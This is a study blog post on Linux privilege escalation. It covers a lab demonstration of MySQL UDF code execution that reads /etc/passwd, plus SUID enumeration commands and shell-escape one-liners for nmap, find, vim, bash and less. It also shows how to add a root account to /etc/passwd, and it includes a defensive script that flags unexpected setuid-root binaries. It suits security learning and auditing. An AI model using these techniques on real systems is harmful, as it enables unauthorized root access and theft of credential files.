
Privilege Escalation Study, Part 1

After getting a shell;

MySQL UDF

Environment setup

docker

# Notice the order of args
docker run --name udf-test-mysql -p 33333:3306 `
-v "D:\works\Privilege Escalation\Mysql UDF\Docker Environment\mysql\log:/var/log/mysql" `
-v "D:\works\Privilege Escalation\Mysql UDF\Docker Environment\mysql\data:/var/lib/mysql" `
-e MYSQL_ALLOW_EMPTY_PASSWORD=yes -d mysql:9.0.1

Connect

mysql -hlocalhost -P33333 -uroot

RCE steps

Check the UDF-related variables:

SHOW VARIABLES LIKE "%plugin%";
/*
+-----------------------------------------------+--------------------------+
| Variable_name                                 | Value                    |
+-----------------------------------------------+--------------------------+
| plugin_dir                                    | /usr/lib64/mysql/plugin/ |
| replication_optimize_for_static_plugin_config | OFF                      |
+-----------------------------------------------+--------------------------+
*/

SHOW VARIABLES LIKE "%secure_file%";
/*
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
*/

Here secure_file_priv is not empty, which does not satisfy the precondition for UDF privilege escalation, so edit /etc/my.cnf by hand:

# secure-file-priv=xxx
secure-file-priv=

The write permission on /usr/lib64/mysql/plugin/ also has to be changed;

Try writing a file:

select '1111' into dumpfile '/usr/lib64/mysql/plugin/';
# Query OK, 1 row affected (0.001 sec)

Now we can get started; grab any payload to test the waters:

od /usr/share/sqlmap/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ -An -t x | tr -d ' '|tr -d '\n'

Write the .so file (not the same one as above):


set @a=unhex('7F454C46020101000000000...');
# Query OK, 0 row affected (0.001 sec)

select @a into dumpfile '/usr/lib64/mysql/plugin/mysql-udf.so';
# Query OK, 1 row affected (0.001 sec)

select * from mysql.func;
/*
+----------+-----+--------------+----------+
| name     | ret | dl           | type     |
+----------+-----+--------------+----------+
| sys_eval | 0   | mysql-udf.so | function |
+----------+-----+--------------+----------+
*/

select sys_eval('cat /etc/passwd');
/*
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
mysql:x:999:999::/var/lib/mysql:/bin/bash
*/

Problem

It seems there was no privilege escalation?

select sys_eval('cat /etc/shadow');
/*

*/

The environment chosen here is a docker-mysql image; the database's default user is mysql, which does not have full root privileges, so no privilege escalation was actually achieved;

Still, combined with SSRF this gives RCE; what you really get depends on the result of whoami;

Linux SUID

When you run ls -l, each entry begins with a 10-character string of the form:

-rwsrwsrwx

Starting from the second character, each group of 3 represents the read, write and execute permissions of the file owner, the group, and other users respectively;

s stands for suid: where the owner's / group's execute permission would be x, it means that when this file is executed the process runs as the file's owner / group;

Set owner User ID up on execution

As the name suggests, the program runs with the owner's privileges;

For example the passwd command, used to change a user's password, must modify /etc/passwd & /etc/shadow, which requires root privileges; the suid mechanism is what grants that;

Privilege escalation steps

Find SUID files

Use the following commands:

# find root-owned suid files
find / -user root -perm -4000 -print 2>/dev/null
# find root-owned suid files and list them in long format
find / -user root -perm -4000 -exec ls -ldb {} \;
# find all suid files
find / -perm -u=s -type f 2>/dev/null
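As an added example (not the post's own code), the following Python script parses the 10-character mode string the way the section above describes and, given the long-format listing the find command produces, flags setuid-root files that are not in a baseline allowlist; the SAMPLE_LS_OUTPUT lines and the BASELINE set are constructed for the demo.

```python
# Added example (not the post's own code): parse the 10-character mode string
# described above and flag setuid-root files missing from a baseline allowlist.
# SAMPLE_LS_OUTPUT and BASELINE below are constructed test data.

def parse_mode(mode: str) -> dict:
    """Split e.g. '-rwsr-xr-x' into owner/group/other triplets.
    Index 0 is the file type; [1:4], [4:7], [7:10] are rwx for owner, group, other.
    An 's' (or 'S' without exec) in the execute slot means setuid / setgid."""
    if len(mode) != 10:
        raise ValueError(f"bad mode string: {mode!r}")
    owner, group, other = mode[1:4], mode[4:7], mode[7:10]
    return {"owner": owner, "group": group, "other": other,
            "setuid": owner[2] in "sS", "setgid": group[2] in "sS",
            "sticky": other[2] in "tT"}

def parse_ls_line(line: str) -> tuple:
    """Return (mode, owner, path, setuid) from one `ls -l` line.
    Fields: mode links owner group size month day time|year path (path may contain spaces)."""
    parts = line.split(None, 8)
    return parts[0], parts[2], parts[8], parse_mode(parts[0])["setuid"]

def unexpected_setuid_root(lines, baseline):
    """Paths that are setuid, owned by root and not in the baseline allowlist."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        mode, owner, path, setuid = parse_ls_line(line)
        if setuid and owner == "root" and path not in baseline:
            hits.append(path)
    return hits

# Constructed sample: what `find / -user root -perm -4000 -exec ls -ld {} \;` might print
SAMPLE_LS_OUTPUT = """\
-rwsr-xr-x 1 root root   68208 Feb  6  2023 /usr/bin/passwd
-rwsr-xr-x 1 root root 2986288 Mar  1  2024 /usr/bin/vim.tiny
-rwsr-sr-x 1 root root  313720 Jan 10  2024 /usr/bin/find
-rwxr-xr-x 1 root root 1396520 Jan  5  2024 /usr/bin/bash
"""
# Hypothetical baseline of setuid binaries expected on this host.
BASELINE = {"/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo"}

if __name__ == "__main__":
    for path in unexpected_setuid_root(SAMPLE_LS_OUTPUT.splitlines(), BASELINE):
        print("unexpected setuid-root binary:", path)
```

Running the script against a real listing amounts to a baseline diff: anything it reports is a setuid-root binary that was not there when the baseline was taken, which is exactly the class of file the programs listed below fall into.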

Exploitable programs

nmap

Requires version 2.02-5.21

nmap --interactive
!sh
whoami
# root

find

find can execute commands;

touch middle
find middle -exec whoami \;
# root

vim/vi

openssl passwd -1 --salt abc 123456

This generates a hash value; using the suid vim you can add the following line to /etc/passwd:

hack:$1$abc$hash:0:0:root:/hack:/bin/bash

and a usable root user has been added;

There is another way to get a shell directly:

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

bash

bash -p
whoami
# root

less/more

less /etc/passwd
!/bin/sh

python/perl/ruby/lua/php/etc

Write code in the respective language and execute it as root;

cp

Overwrite /etc/passwd, same as with vim;

mv

Overwrite /etc/passwd, same as with vim;

Postscript

The suid part has not been reproduced yet; I have been too busy these last couple of days and will fill it in when I have time;